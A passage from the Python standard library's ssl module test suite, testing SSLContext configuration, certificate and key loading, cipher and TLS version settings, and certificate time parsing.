s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@requires_minimum_version
@unittest.skipIf(IS_LIBRESSL, "see bpo-34001")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
